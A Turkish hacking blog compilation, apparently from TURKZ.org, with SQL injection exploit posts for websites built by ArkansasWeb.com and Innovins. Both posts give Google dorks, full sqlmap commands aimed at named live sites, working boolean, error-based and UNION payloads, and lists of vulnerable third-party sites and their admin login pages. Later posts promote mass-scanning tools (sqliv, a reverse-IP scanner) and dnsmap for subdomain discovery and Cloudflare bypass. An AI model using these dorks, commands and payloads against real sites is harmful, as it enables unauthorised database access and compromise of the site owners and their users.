ArkansasWeb.com Sql İnjection Vulnerability

[CODE]#################################################################################

# Exploit Title: ArkansasWeb.com Sql İnjection Vulnerability

# Author : Sipahiler & TURKZ.org

# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=

# Vendor Home: https://www.arkansasweb.com/

# Tested on : Kali Linux 2017.1 Chrome, Firefox

# Date : 2017-10-11

# Blog : http://www.trazer.org/

# Forum : http://www.turkz.org/Forum/     

#################################################################################

Tutorial :

[+] Dorking İn Google Or Other Search Enggine

[+] Open Target

[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=254 AND 4058=4058

    Type: UNION query

    Title: MySQL UNION query (NULL) - 7 columns

    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#

Demo :

http://www.employment4u.com/jobdescription.php?id=254

http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]

Blogspot Siteyi Acunetix İle Taramak Kadar Saçma Bir Hayat

Selamun Aleyküm.. 

HAKKİMDA Kısmında Belirttiğim Gibi Siradan Kendi Halinde Biriyim. Birilerinin Kuyruguna Bastım Bilerek Yada Bilmeyerek ... Umrumdamı ? Degil Tabikide Bu Lamer Arkadaş Kimse Tebrik Ediyorum Blogspot Siteyi Acunetixle Taramak Nedir? Ne Yani Amacin ? Buraya İndex Atsan Ne Olacak ? Ne Geçicek Eline ? 

Blogspot Siteyi Acunetix İle Taramak Kadar Saçma Bir Hayat

Kali Linux Sql İnjection Server Scanner

Selamun Aleyküm ... 

Mazda Gibi Bir Hedef Sİtemız Var Arkadaslar, Cms Joomla

Hedefde Açık Bulunamadıgı Zaman Aynı İp Adresı Üzerındekı Siteler Taranır.

Serversqlscan'da Bu Yuzden Var,Pprogramın Mantıgı Çok Basıt İp adresini Giriyosunuz Buldugu Acıkları Kayit Edecegı Dosya Adını Belırtıyosunuz Beklıyosunuz.. Tool Sizin İçin Bing Arama Motoru Üzerinde İp Adresindeki Siteleri Bulup Sonuna Meta Karakter Olan ' Tek Tırnagı Atiyor Bulursa Gösterip Kayıt Ediyor :) 

Video:

Open Source: https://paste.ubuntu.com/25485392/

Innovins Sql İnjection Vulnerability

[CODE]#################################################################################

# Exploit Title: Innovins Sql İnjection Vulnerability

# Author : Sipahiler & TURKZ.org

# Google Dork : intext:"Developed by Innovins" & inurl:id=

# Tested on : Kali Linux 2017.1 Chrome, Firefox

# Data : 2017-09-05

# Blog : http://www.trazer.org/

# Forum : http://www.turkz.org/Forum/     

#################################################################################

Tutorial :

[+] Dorking İn Google Or Other Search Enggine

[+] Open Target

[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)

    Type: boolean-based blind

    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query

    Title: MySQL UNION query (NULL) - 6 columns

    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :

http://www.charlstondsouza.com/event1.php?id=11

http://www.pehl.co.in/page.php?id=17

http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php

http://pehl.co.in/admin/login.php

http://www.sunrich.co.in/admin

Note: Look İn The Source Code To Find The Admin Panel

References:

http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/

https://cxsecurity.com/issue/WLB-2017090029

[/CODE]

Kali Linux Massive SQL injection Scanner

 Selamun Aleyküm ...

Sqliv Verilen dork'tan birden fazla web sitesini arar ve sonuçları birer birer tarar:

Kurulum:

git clone https://github.com/Hadesy2k/sqliv.git

cd sqliv

ls

python2 setup.py -i

python sqliv.py

Kullanim : 

Python sqliv.py - d < SQLI  DORK >  - e < ARAMA  MOTORU >   

örnek: python sqliv.py - d "inurl:index.php?id= site:IT" -e google 

Isteğe bağlı bağımsız değişkenler:
-h, --help bu yardım mesajını gösterir ve çıkar
-d inurl:SQL enjeksiyon dork
-e google arama motoru [Google şimdilik]
-p arama motorunda aramak için web sitelerinin sayısı 100
-t www.example.com tarama hedef web sitesini
-r ters etki alanı (reverse ip)

Video: 

Kali Linux Dnsmap - Subdomain Enumeration of Website in

Selamun Aleyküm ... 

 

Dnsmap

Paul Craig'in kurduğu "The Thief No One Saw" adlı kurgusal hikayeden esinlenilerek, Dnsmap ilk olarak 2006'da piyasaya sürüldü ve “Stealing the Network – How to 0wn the Box”. Başlıklı kitaptan esinlenildi.

Dnsmap esas olarak pentester tarafından altyapı güvenliği değerlendirme/numaralandırma aşamasında bilgi toplama sırasında kullanılmak üzere tasarlanmıştır. Dnsmap Numaralandırma aşamasında, genellikle hedef şirketin IP netblocks, alt alan adlarını keşfetmek için kullanilir, hatta alt alan adlarını tespit ettigi için bu yöntem cloudflare bypass içinde kullanılır.

Genel Kullanimi : dnsmap <hedef alan adi>

Sonuç:

Dnsmap kullanim örnekleri;

Hedefi bir kelime (wordlist) listesi kullanarak taramak için ;

dnsmap example.com -w /root/Desktop/wordlisteniz.txt

yada: dnsmap example.com -w /usr/share/wordlists/dnsmap.txt

Dnsmap-bulk Kullanim Örnegi;

Birden fazla alan adlarını (domains.txt) içeren bir dosya oluşturun ve bunu dnsmap-bulk.sh 'ye gönderin

 örnek: dnsmap-bulk.sh /root/Desktop/ domains.txt